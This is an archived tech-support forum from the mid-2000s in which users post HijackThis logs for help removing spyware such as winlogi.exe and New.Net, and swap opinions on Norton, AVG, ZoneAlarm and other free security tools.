O20 - Winlogon Notify: NavLogon - C:\WINDOWS\System32\NavLogon.dll
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: DefWatch - Symantec Corporation - C:\Program Files\NavNT\defwatch.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido anti-malware\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido anti-malware\ewidoguard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: InCD File System Service (InCDsrv) - AHEAD Software - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Norton AntiVirus Client (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\NavNT\rtvscan.exe
O23 - Service: Sandra Data Service (SandraDataSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2005.SR3\RpcDataSrv.exe
O23 - Service: Sandra Service (SandraTheSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2005.SR3\RpcSandraSrv.exe
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

Try uninstalling Viewpoint and Weather Bug first of all. Although not all of these are malicious, the following entries merit attention:


O1 - Hosts: Usage Information:

O1 - Hosts: Save Changes - Save any changes you make to hosts file

O1 - Hosts: Reset Default - Will Replace any existing Hosts with a Windows Default one, original file doesn't have to exist

O1 - Hosts: Save Log - Will Save the Hosts as a Text file, Good for Posting

O1 - Hosts: _______________________________________ __________________________

O1 - Hosts: Enable and Disable - Will Swap Hosts Files On the Fly for those that want to use Hosts, and Temporarily Disable it.

O1 - Hosts: _______________________________________ __________________________

O1 - Hosts: Scan for Hosts - Will Search your Windows Drive for Hosts Files, useful if Hosts is in wrong location or installed to Alternate location by Trojan.

O1 - Hosts: Delete - Does exactly that, Delete and Hosts File Selected in the Listbox.

O1 - Hosts: _______________________________________ __________________________

O1 - Hosts: By Option^Explicit, [email protected]

O2 - BHO: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file missing)

O3 - Toolbar: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file missing)

O8 - Extra context menu item: &Viewpoint Search - res://C:\Program Files\Viewpoint\Viewpoint Toolbar\ViewBar.dll/CXTSEARCH.HTML

O9 - Extra button: WeatherBug - {AF6CABAB-61F9-4f12-A198-B7D41EF1CB52} - C:\PROGRA~1\AWS\WEATHE~1\Weather.exe (HKCU)

O16 - DPF: {9522B3FB-7A2B-4646-8AF6-36E7F593073C} (cpbrkpie Control) - http://a19.g.akamai.net/7/19/7125/4021/ftp.coupons.com/v3123/cpbrkpie.cab

O16 - DPF: {A48D0309-8DA3-41AA-98E4-89194D471890} (Pulse V5 ActiveX Control) - http://www.pulse3d.com/players/english/5.2/win/PulsePlayer5.2AxWin.cab
Hi, look down a few messages I had the Newdotnet problem also.  I downloaded and ran MS Windows Defender Beta and it found and got rid of the newdotnet parasite.

125.

Solve : Fixing items in Hijackthis log?

Answer» How would I go about deleting these items in my hijackthis log file?  :-?

O1 - Hosts: 127.0
O1 - Hosts: 12zsearchtoolbar.com
O1 - Hosts: 12zsearchtoolbar.com
O1 - Hosts: 12
O1 - Hosts: 127.0.
O1 - Hosts: u.com
O1 - Hosts: com
O1 - Hosts: r.com
O1 - Hosts: bar.com
O1 - Hosts: olbar.com
O1 - Hosts: toolbar.com
O1 - Hosts: ertoolbar.com
O1 - Hosts: wsertoolbar.com
O1 - Hosts: rowsertoolbar.com
O1 - Hosts: 127.0.
O1 - Hosts: 127.0.0
O1 - Hosts: 1
O9 - Extra button: NeoTrace It! - {9885224C-1217-4c5f-83C2-00002E6CEF2B} - C:\PROGRA~1\NEOTRA~1\NTXtoolbar.htm (file missing) (HKCU)
O16 - DPF: {288C5F13-7E52-4ADA-A32E-F5BF9D125F99} (CR64Loader Object) - http://www.miniclip.com/zenpuzzlegarden/miniclipGameLoader.dll
O16 - DPF: {3A7FE611-1994-4EF1-A09F-99456752289D} (WildTangent Active Launcher) - http://install.wildtangent.com/ActiveLauncher/ActiveLauncher.cab

Is the following entry dangerous? My analysis said it was possibly dangerous, and I've heard it is a trojan. I just wan't to be sure so I dont screw anything up.

C:\WINDOWS\system32\winlogi.exeWraith......  How about posting the full complete hijackthis log .........and then we will be able to give you a definitive response.
Quote
C:\WINDOWS\system32\winlogi.exe
again it may be an issue however the complete log is required .

dl65  Logfile of HijackThis v1.99.1
Scan saved at 7:49:38 AM, on 2/22/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Intel\Intel APPLICATION Accelerator\iaantmon.exe
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
C:\Program Files\NORTON Internet Security\Norton AntiVirus\navapsvc.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\PRISMSVR.EXE
C:\Program Files\Intel\Intel Application Accelerator\iaanotif.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\MUSICMATCH\Musicmatch Jukebox\mmtask.exe
C:\Program Files\HP\HP Software Update\HPWuSchd.exe
C:\Program Files\Java\jre1.5.0_03\bin\jusched.exe
C:\Program Files\MsMovies\MsMovies.exe
C:\WINDOWS\system32\winlogi.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Apache Group\Apache2\bin\ApacheMonitor.exe
C:\Program Files\LimeWire\LimeWire.exe
C:\Program Files\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Jay\Desktop\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.begin2search.com/sidesearch.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.dell4me.com/myway
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:81
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = local
O1 - Hosts: 127.0
O1 - Hosts: 12zsearchtoolbar.com
O1 - Hosts: 12zsearchtoolbar.com
O1 - Hosts: 12
O1 - Hosts: 127.0.
O1 - Hosts: u.com
O1 - Hosts: com
O1 - Hosts: r.com
O1 - Hosts: bar.com
O1 - Hosts: olbar.com
O1 - Hosts: toolbar.com
O1 - Hosts: ertoolbar.com
O1 - Hosts: wsertoolbar.com
O1 - Hosts: rowsertoolbar.com
O1 - Hosts: 127.0.
O1 - Hosts: 127.0.0
O1 - Hosts: 1
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: CNisExtBho Class - {9ECB9560-04F9-4bbc-943D-298DDF1699E1} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\PROGRA~1\FlashFXP\IEFlash.dll
O3 - Toolbar: Web assistant - {0B53EAC3-8D69-4b9e-9B19-A37C9A5676A7} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dllO4 - HKLM\..\Run: [PRISMSVR.EXE] "C:\WINDOWS\System32\PRISMSVR.EXE" /APPLY
O4 - HKLM\..\Run: [IAAnotif] C:\Program Files\Intel\Intel Application Accelerator\iaanotif.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [DVDLauncher] "C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe"
O4 - HKLM\..\Run: [PCMService] "C:\Program Files\Dell\Media Experience\PCMService.exe"
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [UpdateManager] "C:\Program Files\Common Files\Sonic\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [URLLSTCK.exe] C:\Program Files\Norton Internet Security\UrlLstCk.exe
O4 - HKLM\..\Run: [mmtask] C:\Program Files\MUSICMATCH\Musicmatch Jukebox\mmtask.exe
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\HP\HP Software Update\HPWuSchd.exe"
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_03\bin\jusched.exe
O4 - HKLM\..\Run: [MsMovies] C:\Program Files\MsMovies\MsMovies.exe /auto
O4 - HKLM\..\Run: [virtual-ie] winlogi.exe
O4 - HKLM\..\RunServices: [virtual-ie] winlogi.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [DellSupport] "C:\Program Files\Dell Support\DSAgnt.exe" /startup
O4 - HKCU\..\Run: [ProxyWay] C:\Program Files\ProxyWay\proxyway.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [Desktop Macros] C:\Program Files\Desktop Macros\MacroS.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Digital Line Detect.lnk = ?
O4 - Global Startup: Monitor Apache Servers.lnk = C:\Program Files\Apache Group\Apache2\bin\ApacheMonitor.exe
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &NeoTrace It! - C:\PROGRA~1\NEOTRA~1\NTXcontext.htm
O8 - Extra context menu item: &Translate English Word - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: NeoTrace It! - {9885224C-1217-4c5f-83C2-00002E6CEF2B} - C:\PROGRA~1\NEOTRA~1\NTXtoolbar.htm (file missing) (HKCU)
O16 - DPF: {01111F00-3E00-11D2-8470-0060089874ED} (Support.com Installer) - http://supportsoft.adelphia.net/sdccommon/download/tgctlins.cab
O16 - DPF: {106E49CF-797A-11D2-81A2-00E02C015623} (ALTERNATIFF ActiveX) - http://www.alternatiff.com/install/00/alttiff.cab
O16 - DPF: {1754A1BA-A1DF-4F10-B199-AA55AA1A120F} (InstallerBehaviorFactory Class) -https://signup.msn.com/pages/MsnInstC.cab
O16 - DPF: {288C5F13-7E52-4ADA-A32E-F5BF9D125F99} (CR64Loader Object) - http://www.miniclip.com/zenpuzzlegarden/miniclipGameLoader.dll
O16 - DPF: {3A7FE611-1994-4EF1-A09F-99456752289D} (WildTangent Active Launcher) - http://install.wildtangent.com/ActiveLauncher/ActiveLauncher.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{B5B3DEDA-EF7F-40AE-81C8-EF9F78409863}: NameServer = 67.21.13.2,67.21.13.4
O20 - Winlogon Notify: accwms - C:\WINDOWS\system\accwms.dll (file missing)
O20 - Winlogon Notify: infoap - C:\WINDOWS\system32\IAS\infoap.dll (file missing)
O20 - Winlogon Notify: keyodbc - C:\WINDOWS\system\keyodbc.dll (file missing)
O20 - Winlogon Notify: netcr - C:\WINDOWS\Config\netcr.dll (file missing)
O20 - Winlogon Notify: svrmc - C:\WINDOWS\MICROS~1.NET\svrmc.dll (file missing)
O20 - Winlogon Notify: sysodbc - C:\WINDOWS\Cursors\sysodbc.dll (file missing)
O20 - Winlogon Notify: taskad - C:\WINDOWS\AppPatch\taskad.dll (file missing)
O20 - Winlogon Notify: tasklog - C:\WINDOWS\AppPatch\tasklog.dll (file missing)
O23 - Service: Apache2 - Unknown owner - C:\Program Files\Apache Group\Apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Network Proxy (ccProxy) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: IAA Event Monitor (IAANTMon) - Intel Corporation - C:\Program Files\Intel\Intel Application Accelerator\iaantmon.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: Norton AntiVirus Auto PROTECT Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing)
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Ventrilo - Unknown owner - C:\Program Files\VentSrv\ventrilo_svc.exe (file missing)

Oh, nevermind I should have figured this out myself...   :-/

EDIT 1: I deleted at least most of the malicious entries I believe.Found the fixit button eh?  
GOOD for you, take a look around in Hijackthis, there is some good stuff there.The following entries need attention:

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.begin2search.com/sidesearch.html

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.dell4me.com/myway

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:81

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = local

O1 - Hosts: 127.0

O1 - Hosts: 12zsearchtoolbar.com

O1 - Hosts: 12zsearchtoolbar.com

O1 - Hosts: 12

O1 - Hosts: 127.0.

O1 - Hosts: u.com

O1 - Hosts: com

O1 - Hosts: r.com

O1 - Hosts: bar.com

O1 - Hosts: olbar.com

O1 - Hosts: toolbar.com

O1 - Hosts: ertoolbar.com

O1 - Hosts: wsertoolbar.com

O1 - Hosts: rowsertoolbar.com

O1 - Hosts: 127.0.

O1 - Hosts: 127.0.0

O1 - Hosts: 1

O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
 
O4 - HKLM\..\Run: [MsMovies] C:\Program Files\MsMovies\MsMovies.exe /auto

O4 - HKLM\..\Run: [virtual-ie] winlogi.exe

O4 - HKLM\..\RunServices: [virtual-ie] winlogi.exe

O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background

O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
 
O16 - DPF: {3A7FE611-1994-4EF1-A09F-99456752289D} (WildTangent Active Launcher) - http://install.wildtangent.com/ActiveLauncher/ActiveLauncher.cab

O20 - Winlogon Notify: accwms - C:\WINDOWS\system\accwms.dll (file missing)

O20 - Winlogon Notify: infoap - C:\WINDOWS\system32\IAS\infoap.dll (file missing)

O20 - Winlogon Notify: keyodbc - C:\WINDOWS\system\keyodbc.dll (file missing)

O20 - Winlogon Notify: netcr - C:\WINDOWS\Config\netcr.dll (file missing)

O20 - Winlogon Notify: svrmc - C:\WINDOWS\MICROS~1.NET\svrmc.dll (file missing)

O20 - Winlogon Notify: sysodbc - C:\WINDOWS\Cursors\sysodbc.dll (file missing)

O20 - Winlogon Notify: taskad - C:\WINDOWS\AppPatch\taskad.dll (file missing)

O20 - Winlogon Notify: tasklog - C:\WINDOWS\AppPatch\tasklog.dll (file missing)

O23 - Service: Apache2 - Unknown owner - C:\Program Files\Apache Group\Apache2\bin\Apache.exe" -k runservice (file missing)

O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing)

O23 - Service: Ventrilo - Unknown owner - C:\Program Files\VentSrv\ventrilo_svc.exe (file missing)


Reboot to Safe Mode, search for and delete the following files or folders:

C:\Program Files\MsMovies\
winlogi.exe


It would be advisable to disable System Restore and flush any restore points and to carry out full AV and malware checks.
126.

Solve : Help requested regarding Zonealarm?

Answer»

Hi

I am using zonealarm antivirus for both my office and home pc. My office pc is connected to Internet and it is regulary update. The problem is with my home pc which is not connected to the internet. Can anyone please suggest me where any antivirus updates are installed and how can i get them to my home pc.

Appreciates any response from UR end.

Reg
AzadIf I'm right, you can download the files from the Zone Labs website. Once saved, you can update using a file. Also, this might just be my morning confusion, but why do you NEED antivirus protection on your home computer if it has no internet access?

FlameA system that's not on a network can still be INFECTED via CD, diskette or other foreign media.Possible, but very unlikely. Depends who it comes from.

FlameUnlikely? I regularly see infected machines that are not network connected. Perhaps Little Johnny has brought home a copied Care Bears CD from school, or Big Johnny has brought the latest Shoot bin Laden game via floppy into the office.
The difference is that the machines that I see (Non business anyway) that are connected to the internet are almost certainly infected in some way.If Johnny would have obtained this CD legally, there would be no PORBLEMS.  

Flame Quote

If Johnny would have obtained this CD legally, there would be no porblems.  

Flame

Unless of course it was a SonyBMG music CD.  I'm not so sure what that is... A burnt CD?

FlameOne of Sony's titles that incorporated a rootkit. Google for that story if you haven't heard it.

http://www.boingboing.net/2005/11/17/sony_rootkit_roundup.html
127.

Solve : Quick question on AVG...?

Answer»

Does AVG Free Edition search for adware and spyware along with viruses?Not that I know of... If your computer is compatible, then USE Microsoft AntiSpyware BETA. Best spyware bloodhound out there  

[glb]Flame[/glb]Thanks a bunch Flame  AdAware and Spybot are both free, and not Microsoft.  Microsoft AntiSpyware BETA is free...  

[glb]Flame[/glb] Quote

Microsoft AntiSpyware BETA is free...  

[glb]Flame[/glb]
Lets not forget what "beta" stands for. It is a program in the works and
the users of beta programs are the field testers.......you take your chances,
the same goes for "free programs" again field TESTING.qzqhk2  
Quote
do not forget what "beta" stands for. It is a program in the works and
the users of beta programs are the field testers.......you take your chances,
the same goes for "free programs" again field testing.

Your correct ......but antispyware actually works better than most ......

dl65   Quote
Quote
Microsoft AntiSpyware BETA is free...  

[glb]Flame[/glb]
Lets not forget what "beta" stands for. It is a program in the works and
the users of beta programs are the field testers.......you take your chances,
the same goes for "free programs" again field testing.
 How long has the "beta" version been out now?  It's been over a year, the first version was released January 6, 2005.  So, I'd hardly consider that still "beta".  Why they haven't dropped "beta", I have no idea, but it's clearly been used by MANY thousands of users by now, and it seems to have a good track record.  
They will drop the 'beta' when they start charging money for it.
Last time they MUTED that idea the public backlash scared them.... 'People Power'
I think they're now between a rock & a hard place, they don't know what to do with it. No it does not. I use AVG and also use AdAware SE, SpyBotSD and SpywareBlaster all of which are freeware.

FREEWARE
128.

Solve : New.Net Parasite?

Answer»

Any idea what New.Net is and how to get rid of it?  It keeps coming up on my Spy Subtract log as a parasite in the windows registry and when I delete it it comes back.   I am running XP.  I have deleted it, SHUT off the system restore, rebooted and TURNED on the system restore and it comes back when I rescan with Spy Subtract.  Ad Aware and MS Windows Defender don't seem to find it.Ewido is the flavour of the Month.
http://www.ewido.net/en/
Download, install, update & scan.Thanks, I got rid of it with MS Windows Defender.  I just wasn't being patient enough!!!!  Is that the new & improved Microsoft Antispyware BETA?
If so, what did you think of it?YES it is.  SEEMS to be working, it found several items that Spy Subtract did not.  So far so good!!

129.

Solve : Disgusted with Norton. Good alternatives??

Answer»

I've always hated Norton.
It consumes way too many system resources, contains a ton of "extra" useless crap, is impossible to configure and a headache to get rid of.

I use it on my desktop computer only to search supicious FILES for viruses. Everything else I have disabled (I think... its hard to be sure).

But I just bought a new laptop and it comes with and "Internet Security" version of Norton (or somesuch). I has already been annoying the *censored* out of me with a flurry of notifications, etc. But the last straw was today, when I had to call verizon tech support because my laptop was not able to connect to the internet for several days, or network with my desktop (though it has worked fine at first).

We finally pinpointed Norton as the cause. Once I had disabled Norton, everything worked fine again. I was really pissed when I discovered Norton to be responsible. I knew it was an obnoxious program, but I never thought it could get in the way so much.


Is anybody still reading after all that?
So I am thinking of completely wiping Norton off my laptop, and finding another program that is not so worthless.

Any suggestions for a good firewall or freeware antivirus program? (I've heard AVG is good.) I use Spybot and Adaware too.
Or does anybody here think that Norton still has some redeeming qualities?AVG Free is a fine solution for me on my Windows boxes.

Be sure and uninstall Norton completely. They have a program on their website to help remove it after the basic Windows uninstall, if needed.If you decide to use Spybot for spyware make sure you turn on the Resident features to get realtime protection.

Firewall... Sygate Version 5.5 Build 2710
http://207.33.111.31/spf/Wont that be out dated soon?   since they no longer update the free version?You have quite a few alternatives.
For the AV, AVG is popular. AntiVir is good. Avast is another good one.

You have a few good firewalls to choose from. Unlike AVs, firewalls don't need the constant UPDATING. Sygate is a good firewall regardless of the manufacturer continues to support it. Kerio is a very good unit. Zone Alarm and Outpost are popular. Some swear by them. Others swear at them.

To replace Nortons script protection, check out Script Sentry at Jasons Toolbox. It's excellent and uses no resources.
All these are free. All are better than Norton.
Rick Quote

Wont that be out dated soon?   since they no longer update the free version?

Listen & learn Grasshopper.  Thank you all for your excellent recommendations. I will check them all out. Any more suggestions... keep 'em coming!

Soon, hopefully, I can become Norton-free.AVG Free. Norton is a horrible memory hog and it acts like a virus when you try to remove it.

Don't forget Firefox..I would suggest paying for an alternative, but if you only want a freeware anti-virus I would highly recommend Avast!, unless you have an old computer (because it runs a little slow on older machines).

If you want to purchase an AV I would suggest getting Trend Micro's PC-cillin.

I also recommend Sygate as a personal firewall.

Quote
Wont that be out dated soon?   since they no longer update the free version?


I know many people who use an older version of ZoneAlarm from 2 or 3 years AGO because they like it better than the new ones.

Links to all of these free utilities, plus plenty of anti-spyware ones, can be found on this page.

with regards[/color] Quote
AVG Free. Norton is a horrible memory hog and it acts like a virus when you try to remove it.

Don't forget Firefox..
AVG free found items that norton and mcafee missed. avgfree"www.grisof.com"
both norton and mcafee caused me a lot of headachs.yeh, i hate norton (came preinstalled with this laptop).

For antivirus i use McAfee (if you want a free one go for AVG)
for firewall i am using kerio free.

Who dug up this thread from a month ago?   I have personally not heard much anything good of norton, I uninstalled everything on my machine with the words norton or symantec as soon as I plugged it in. I like McAfee, but I love Avast! personal edition(free), I use Zone Alrm personal firewall(free) and have no complaints about it at all. I also use adaware personal and microsoft anti spyware beta. I really like free stuff but I am very cautious about what I download. I personnally like to use the free shareware available for download at http://http://www.komando.com/I also used to have Norton. Never again. Bloated, resource hungry, invasive, not nearly as effective as they'd like you to BELIEVE. I use freeware exclusively to secure my systems. My main unit has been completely clean for over 3 years now, after dumping Norton. On the units I use for test purposes, freeware security apps have performed as well as the purchased ones, if not better. For the AV, I've settled on AntiVir. It doesn't have all the fancy extras the big names do. Doesn't use near as much disk space or system resources either. It's done quite well for me, especially against trojans.
For the firewall, I use Kerio 2.1.5. Very small, strictly rule based, very configurable, no frills.
For protection against malicious scripts, check out Script Sentry. It's caught things for me that everything else missed.
For controlling ads and popups, Proxomitron is tops.
If you need something to monitor your registry, especially the autostart areas, give RegistryProt a try.
All these are high quality applications that are free, easy on disk space and resources and are very effective. All of them combined use far less disk space and resources than NIS does.
RickBeen using Norton for over 3 years, and I'm satisfied with it.  Bought Norton System Works (NSW) 2002 and Norton Personal Firewall 2002 as a package sometime near the end of 2002.  At that time, my OS was Win 98SE.  I installed NSW, which includes NAV, with Win 98SE.  Subsequently, I started using Win XP; with it, I only installed the NAV component of NSW.  I also installed Norton Personal Firewall 2002 with Win XP.   Of course, I have renewed annual subsriptions to NAV so that I continue getting updates to virus DEFINITIONS.  

Never got infected with a virus while using NAV.  And, going back 1 to 2 years or so ago, I actually received hundreds of virus-infected messages from junk mail coming in from a website I maintain.  NAV stopped all of them.

Works fine for me.  Seems to be working fine for my son, who also has NAV and NPF on his computer.  I'm not sure what version/year he has.  

One clear impression I've gotten from various forum discussions on Norton is the resource-hog complaints indicate that Norton got worse in 2003 and 2004 than in 2002, and then got better in 2005; by then, Symantec apparently decided too many users were complaining about that aspect of Norton.  So, I'm glad I just kept renewing my subsriptions to NAV 2002 rather going out and buying the 2003 or 2004 version.
130.

Solve : AVG Flaws??

Answer»

It seems like a LOT of you use AVG Free for ANTIVIRUS protection. I must know however, is there anything bad about it? Any flaws? Regrets?

FlameIt's hard to regret "Free and it works"!   The only downside is that auto update stops working after a few weeks or so and all that means is you have to click on update from time to time.
Being on DIALUP I never let any programs auto update anyway.
